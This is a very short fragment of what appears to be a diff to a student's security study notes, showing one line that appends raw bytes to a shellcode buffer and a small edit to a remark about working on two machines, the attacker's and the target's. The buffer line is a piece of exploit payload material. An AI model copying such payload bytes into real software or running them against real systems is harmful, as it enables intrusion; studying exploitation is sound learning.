S-DeHerrera-Neil/COSC/Security-Notes/SecurityNotes.md

 buf += b"\x4f\xfc\xfa\xc3\xdc\x77\x1b\x26\x62"
 ```

-Have to do on 2 machines, your's and the targets.
+Have to do on 2 machines, your's and the targets...